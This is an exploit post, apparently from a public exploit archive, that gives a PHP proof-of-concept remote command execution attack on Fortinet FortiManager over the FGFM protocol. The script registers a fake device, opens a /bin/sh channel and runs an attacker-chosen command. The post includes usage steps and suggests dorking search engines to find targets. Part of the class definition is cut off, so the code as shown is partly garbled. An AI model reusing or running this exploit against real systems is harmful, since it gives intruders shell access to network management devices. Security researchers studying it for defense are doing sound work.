============================================================================================================================================= | # Title : Fortinet FortiManager 7.6.0 PHP Code Injection Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 135.0.1 (64 bits) | | # Vendor : https://fortiguard.fortinet.com/ | ============================================================================================================================================= POC : [+] Dorking İn Google Or Other Search Enggine. [+] The code is an RCE (Remote Command Execution) exploit of a vulnerability in Fortinet's FortiManager devices, and works via the FGFM protocol. The code exploits a flaw in the new device registration mechanism to gain access to execute commands on the targeted system. [+] save code as poc.php . [+] USage : cmd => c:\www\test\php poc.php [+] SeT target = Line : 87 [+] PayLoad : host = $host; $this->clientCert = $clientCert; $this->clientKey = $clientKey; } public function exploit() { $socket = $this->makeSocket(); if (!$socket) { die("[-] Connection failed.\n"); } echo "[+] Registering device...\n"; $req1 = "get auth\r\nserialno={$this->serialNumber}\r\nplatform={$this->platform}\r\nhostname=localhost\r\n\r\n\x00"; $resp1 = $this->sendPacket($socket, $req1); if (strpos($resp1, 'reply 200') === false) { die("[-] Request 1 failed: No reply 200.\n"); } echo "[+] Creating channel...\n"; $req2 = "get connect_tcp\r\ntcp_port=rsh\r\nchan_window_sz=" . (32 * 1024) . "\r\nterminal=1\r\ncmd=/bin/sh\r\nlocalid=0\r\n\r\n\x00"; $resp2 = $this->sendPacket($socket, $req2); if (strpos($resp2, 'action=ack') === false) { die("[-] Request 2 failed: No ack.\n"); } preg_match('/localid=(\d+)/', $resp2, $matches); if (!$matches) { die("[-] Request 2 failed: No localid found.\n"); } $localid = $matches[1]; echo "[+] Triggering...\n"; $payload = "id"; // تغيير الحمولة بحسب الحاجة $req3 = "channel\r\nremoteid={$localid}\r\n\r\n\x00" . strlen($payload) . "\n" . $payload . "0\n"; $this->sendPacket($socket, $req3, false); } private function makeSocket() { $contextOptions = [ 'ssl' => [ 'verify_peer' => false, 'verify_peer_name' => false, 'allow_self_signed' => true ] ]; if ($this->clientCert) { $contextOptions['ssl']['local_cert'] = $this->clientCert; } if ($this->clientKey) { $contextOptions['ssl']['local_pk'] = $this->clientKey; } $context = stream_context_create($contextOptions); return stream_socket_client(($this->ssl ? "ssl" : "tcp") . "://{$this->host}:{$this->port}", $errno, $errstr, 30, STREAM_CLIENT_CONNECT, $context); } private function sendPacket($socket, $data, $read = true) { $packet = pack('NN', 0x36E01100, strlen($data) + 8) . $data; fwrite($socket, $packet); if (!$read) return null; $header = fread($socket, 8); if (!$header) { echo "[-] Failed to read an FGFM header\n"; return null; } list($magic, $len) = unpack('NN', $header); if ($magic !== 0x36E01100 || $len < 8) { echo "[-] Bad header\n"; return null; } return fread($socket, $len - 8); } } // استخدام الكود $exploit = new FortinetExploit("192.168.1.1"); $exploit->exploit(); Greetings to :===================================================================================== jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)| ===================================================================================================